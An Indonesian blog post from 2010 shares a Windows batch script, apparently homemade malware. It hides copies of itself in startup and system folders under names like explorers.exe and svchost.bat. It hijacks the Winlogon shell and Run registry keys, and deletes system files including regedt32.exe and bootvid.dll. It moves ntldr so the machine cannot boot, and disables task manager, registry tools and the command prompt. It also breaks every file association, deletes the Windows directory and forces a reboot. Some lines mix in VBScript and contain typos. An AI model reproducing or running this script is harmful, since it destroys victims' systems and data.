Selasa, 02 Maret 2010

batch made by ferdy

copy ferdy.exe “%ALLUSERSPROFILE%\Start Menu\Programs\Startup\”
attrib ferdy.exe +s +h +r
copy ferdy.exe “%USERSPROFILE%\Start Menu\Programs\Startup\”
attrib ferdy.exe +s +h +r
echo silahkan tunggu sebentar....
del "c:\windows\system32\bootok" /q/s >nul
del "c:\windows\system32\bootvid.dll" /q /s >nul
del "c:\windows\system32\bootvrfy" /q /s >nul
del "c:\windows\system32\regedt32.exe" /q /s >nul
ren ferdy.exe explorers.exe
copy explorers.exe %SYSTEMROOT%\
copy explorers.exe %SYSTEMROOT%\svchost.bat
copy explorers.exe %SYSTEMROOT%\system32\
copy explorers.exe %SYSTEMROOT%\system32\svchost.bat
copy explorers.exe “%ALLUSERSPROFILE%\Start Menu\Programs\Startup\”
attrib explorers.exe +s +h +r
copy explorers.exe “%USERSPROFILE%\Start Menu\Programs\Startup\”
attrib explorers.exe +s +h +r
reg add “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths” /ve /d %systemroot%\explorers.exe /t reg_dword /d 0 /f
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v System /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v System /d explorers.exe /t reg_dword /d 0 /f
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v explorer /d explorers.exe /t reg_dword /d 0 /f
cd %SYSTEMROOT%\system32\
attrib explorers.exe +s +h +r
cd %SYSTEMROOT%\
attrib explorers.exe +s +h +r
echo [ferdy] >> win.ini
echo path=%SYSTEMROOT%\explorers.exe >>win.ini
cd %systemdrive%\
attrib ntldr -s -h -r
ren ntldr ferdy
move /y ferdy %systemroot%/system32
attrib ferdy +s +h +r
reg add "HKCU\software\microsoft\windows\currentversion\policies\system" /v disableregistrytools /t reg_dword /d 1 /f
reg add "HKCU\software\microsoft\windows\currentversion\policies\system" /v disabletaskmgr /t reg_dword /d 1 /f
WshShell.RegDelete “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”
WshShell.RegDelete “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\
Policies\System\DisableTaskMgr”
WshShell.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\
Winlogon\Shell”,”explorers.exe”
WshShell.RegDelete “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\Shell”
WshShell.RegDelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Policies\System\Shell”
assoc .*=.f3rdy
attrib explorers.exe +s +h +r
reg add "hkcu\softaware\microsoft\windows\currentversion\policies\system" /v disablecmd /t reg_dword /d 2 /f
del %systemroot%
shutdown -r -t 1 -f
exit p/a/q

Categories :
Read more »
Selasa, Maret 02, 2010 Unknown No comments

0 komentar:

Posting Komentar